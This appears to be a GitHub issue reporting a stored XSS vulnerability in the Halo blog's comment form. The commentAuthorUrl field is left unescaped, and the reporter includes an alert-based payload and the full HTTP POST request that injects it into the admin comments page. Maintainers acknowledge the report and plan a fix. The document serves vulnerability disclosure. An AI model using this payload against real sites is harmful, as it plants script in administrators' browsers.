Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

These is Another stored xss vulnerability #127

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Closed
4 of 6 tasks

These is Another stored xss vulnerability #127

Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Comments

@Artemis1029
Copy link

Artemis1029 commented Apr 4, 2019

我确定我已经查看了 (标注[ ][x])


我要申请 (标注[ ][x])

  • BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

Bug Report

I find that You have do HtmlUtil.escape for CommentContent
图片
but do nothing with CommentAuthorUrl
图片

payload:commentAuthorUrl="><img src=1 onerror=alert(123)>
图片

POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2

postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28

in uri /admin/comments?status=1
图片

@JohnNiang
Copy link
Member

非常感谢您的漏洞反馈!我们将在 v1.0 版本进行修复。

@JohnNiang JohnNiang added the kind/bug Categorizes issue or PR as related to a bug. label Apr 4, 2019
@JohnNiang JohnNiang added this to To do in Halo-v1 progress via automation Apr 4, 2019
@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 4, 2019
@MyFaith MyFaith closed this as completed Apr 7, 2019
Halo-v1 progress automation moved this from To do to Done Apr 7, 2019
@MyFaith MyFaith reopened this Apr 7, 2019
Halo-v1 progress automation moved this from Done to In progress Apr 7, 2019
@MyFaith MyFaith moved this from In progress to To do in Halo-v1 progress Apr 7, 2019
@JohnNiang JohnNiang removed this from To do in Halo-v1 progress May 21, 2019
@ruibaby
Copy link
Member

ruibaby commented May 28, 2019

准备发布 v1,所以关闭该 issue。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

4 participants